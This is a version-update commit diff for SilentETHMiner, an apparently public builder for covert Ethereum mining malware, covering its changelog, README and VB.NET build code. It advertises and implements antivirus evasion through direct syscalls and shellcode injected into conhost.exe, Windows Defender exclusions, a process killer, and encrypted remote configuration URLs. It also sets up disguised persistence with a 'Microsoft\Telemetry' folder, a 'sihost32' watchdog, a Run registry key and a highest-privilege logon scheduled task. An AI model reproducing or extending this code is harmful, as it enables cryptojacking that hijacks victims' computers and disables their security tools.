Updated to v1.6.1

* Added Process Killer feature that constantly checks for the "Kill Targets" programs and kills them if found
* Added failover capability for the Remote Configuration URL, add several URLs by separating them with a comma (,)
* Changed system calls to direct system calls thus reducing detections
* Changed native loader code to reduce detections
* Removed Online Download feature due to domain being taken down
* Improved overall code
* Updated miner

CHANGELOG.md

@@ -1,3 +1,11 @@
+### v1.6.1 (10/10/2021)
+* Added Process Killer feature that constantly checks for the "Kill Targets" programs and kills them if found
+* Added failover capability for the Remote Configuration URL, add several URLs by separating them with a comma (,)
+* Changed system calls to direct system calls thus reducing detections
+* Changed native loader code to reduce detections
+* Removed Online Download feature due to domain being taken down
+* Improved overall code
+* Updated miner
 ### v1.6.0 (02/10/2021)
 **The previous version was supposed to be the last one before the unified miner but I recieved great results by loading everything by Shellcode making it worthwhile to update**
 * Added new Shellcode loader, the miner, watchdog and uninstaller will now be converted into shellcode and injected using a native C loader which greatly reduces detections

README.md

@@ -1,7 +1,7 @@
 
 <img src="https://github.com/UnamSanctam/SilentETHMiner/blob/master/SilentETHMiner.png?raw=true">
 
-# SilentETHMiner v1.6.0 - Based on Lime Miner v0.3
+# SilentETHMiner v1.6.1 - Based on Lime Miner v0.3
 
 Can mine any Ethash or Etchash cryptocurrency.
 
@@ -16,7 +16,7 @@ Can mine any Ethash or Etchash cryptocurrency.
 * Ethash/Etchash - Supports mining all Ethash/Etchash coins like Ethereum, Ethereum Classic, Etho, Metaverse, Ellaism, QuarkChain and others
 * Remote Configuration - Can get the miner settings remotely from a URL every 100 minutes
 * Bypass Windows Defender - Adds exclusions into Windows Defender for the general folders the miner uses
-* Online Downloader - Can download the miner binary during runtime to greatly decrease file size and detections
+* Process Killer - Constantly checks for any programs in the "Kill Targets" and kills them if found
 
 ## Downloads
 
@@ -41,6 +41,14 @@ So the requirements are as follow:
 
 ## Changelog
 
+### v1.6.1 (10/10/2021)
+* Added Process Killer feature that constantly checks for the "Kill Targets" programs and kills them if found
+* Added failover capability for the Remote Configuration URL, add several URLs by separating them with a comma (,)
+* Changed system calls to direct system calls thus reducing detections
+* Changed native loader code to reduce detections
+* Removed Online Download feature due to domain being taken down
+* Improved overall code
+* Updated miner
 ### v1.6.0 (02/10/2021)
 **The previous version was supposed to be the last one before the unified miner but I recieved great results by loading everything by Shellcode making it worthwhile to update**
 * Added new Shellcode loader, the miner, watchdog and uninstaller will now be converted into shellcode and injected using a native C loader which greatly reduces detections

SilentETHMiner/Codedom.vb

@@ -50,19 +50,15 @@ Public Class Codedom
             F.txtLog.Text = F.txtLog.Text + ("Creating resources..." + vbNewLine)
 
             Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Res + ".Resources")
-                If Not F.FA.toggleDownloader.Checked Then
-                    R.AddResource(F.Resources_eth, F.AES_Encryptor(My.Resources.ethminer))
-                End If
+                R.AddResource(F.Resources_eth, F.AES_Encryptor(My.Resources.ethminer))
                 If F.chkInstall.Checked And F.toggleWatchdog.Checked Then
                     R.AddResource(F.Resources_watchdog, F.AES_Encryptor(F.watchdogdata))
                 End If
                 R.Generate()
             End Using
 
-            If Not F.FA.toggleDownloader.Checked Or (F.chkInstall.Checked And F.toggleWatchdog.Checked) Then
-                F.txtLog.Text = F.txtLog.Text + ("Embedding resources..." + vbNewLine)
-                .EmbeddedResources.Add(IO.Path.GetTempPath & "\" + Res + ".Resources")
-            End If
+            F.txtLog.Text = F.txtLog.Text + ("Embedding resources..." + vbNewLine)
+            .EmbeddedResources.Add(IO.Path.GetTempPath & "\" + Res + ".Resources")
 
             Dim minerbuilder As New StringBuilder(Code)
 
@@ -135,6 +131,7 @@ Public Class Codedom
             Dim filename = Path.GetFileNameWithoutExtension(SavePath)
             Dim paths As Dictionary(Of String, String) = New Dictionary(Of String, String)() From {
                     {"current", currentDirectory},
+                    {"includes", Path.Combine(currentDirectory, "Includes")},
                     {"compilers", Path.Combine(currentDirectory, "Compilers")},
                     {"compilerslog", Path.Combine(currentDirectory, "Compilers\logs")},
                     {"windres", Path.Combine(currentDirectory, "Compilers\MinGW64\bin\windres.exe")},
@@ -159,6 +156,12 @@ Public Class Codedom
                 End Using
             End If
 
+            If Not Directory.Exists(paths("includes")) Then
+                Using archive As ZipArchive = New ZipArchive(New MemoryStream(My.Resources.Includes))
+                    archive.ExtractToDirectory(paths("includes"))
+                End Using
+            End If
+
             Dim sb As StringBuilder = New StringBuilder(My.Resources.Program1)
             Dim buildResource As Boolean = Not String.IsNullOrEmpty(ICOPath) OrElse RequireAdministrator OrElse AssemblyData
 
@@ -196,20 +199,23 @@ Public Class Codedom
                 If F.BuildErrorTest(Not File.Exists(paths("resource.o")), String.Format("Error: Failed at compiling resources, check the error log at {0}.", paths("windreslog"))) Then Return
             End If
 
-            F.RunExternalProgram(paths("donut"), String.Format("""{0}"" -a 2 -f 1", InputFile), currentDirectory, paths("tcclog"))
+            F.RunExternalProgram(paths("donut"), String.Format("""{0}"" -a 2 -f 1", InputFile), currentDirectory, paths("donutlog"))
             Dim shellcodebytes As String = File.ReadAllText(paths("loader"), Encoding.GetEncoding("ISO-8859-1"))
             Dim shellcode As String = F.ToLiteral(F.Cipher(shellcodebytes, F.Key))
 
+            sb.Replace("#KEYLENGTH", F.Key.Length)
             sb.Replace("#KEY", F.Key)
             sb.Replace("#DELAY", F.txtStartDelay.Text)
             sb.Replace("#SHELLCODELENGTH", shellcodebytes.Length)
             sb.Replace("#SHELLCODE", shellcode)
             sb.Replace("#ARGS", Args)
             F.CipherReplace(sb, "#ENV", "SystemRoot")
-            F.CipherReplace(sb, "#TARGET", "System32\\conhost.exe")
+            F.CipherReplace(sb, "#TARGET", "System32\conhost.exe")
+            F.CipherReplace(sb, "#FORMAT1", "%s\%s")
+            F.CipherReplace(sb, "#FORMAT2", """%s"" ""%s""")
 
             File.WriteAllText(paths("filename") & ".c", sb.ToString(), Encoding.GetEncoding("ISO-8859-1"))
-            F.RunExternalProgram(paths("tcc"), String.Format("-Wall -Wl,-subsystem=windows ""{0}"" {1} -lntdll", paths("filename") & ".c", If(buildResource, "resource.o", "")), currentDirectory, paths("tcclog"))
+            F.RunExternalProgram(paths("tcc"), String.Format("-Wl,-subsystem=windows ""{0}"" {1} ""{2}"" -xa ""{3}"" ", filename & ".c", If(buildResource, "resource.o", ""), Path.Combine(currentDirectory, "Includes\syscalls.c"), Path.Combine(currentDirectory, "Includes\syscallsstubs.asm")), currentDirectory, paths("tcclog"))
             File.Delete(paths("resource.o"))
             File.Delete(paths("filename") & ".c")
             File.Delete(paths("loader"))
@@ -277,10 +283,6 @@ Public Class Codedom
             stringb.Replace("DefDebug", "true")
         End If
 
-        If F.FA.toggleDownloader.Checked Then
-            stringb.Replace("DefDownloader", "true")
-        End If
-
         If F.FA.toggleShellcode.Checked Then
             stringb.Replace("DefShellcode", "true")
         End If
@@ -303,9 +305,9 @@ Public Class Codedom
 
             If F.FA.toggleInstallSystem32.Checked Then
                 stringb.Replace("DefSystem32", "true")
-                stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & "), Encoding.ASCII.GetString(_rAESMethod_(Convert.FromBase64String(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))))")
+                stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & "), _rGetString_(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))")
             Else
-                stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & ", Encoding.ASCII.GetString(_rAESMethod_(Convert.FromBase64String(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))))")
+                stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & ", _rGetString_(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))")
             End If
 
 
@@ -332,8 +334,6 @@ Public Class Codedom
         stringb.Replace("#SALT", F.SALT)
         stringb.Replace("#IV", F.IV)
         stringb.Replace("#REGKEY", F.EncryptString("Software\Microsoft\Windows\CurrentVersion\Run\"))
-        stringb.Replace("#SANCTAMMINERURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=ethminer"))
-        stringb.Replace("#MINERURL", F.EncryptString("https://github.com/UnamSanctam/SilentETHMiner/raw/master/SilentETHMiner/Resources/ethminer.zip"))
         stringb.Replace("#LIBSPATH", F.EncryptString("Microsoft\Telemetry\"))
         stringb.Replace("#WATCHDOG", F.EncryptString("sihost32"))
         stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn """ + Path.GetFileNameWithoutExtension(F.txtInstallFileName.Text) + """ /tr ""{0}"""))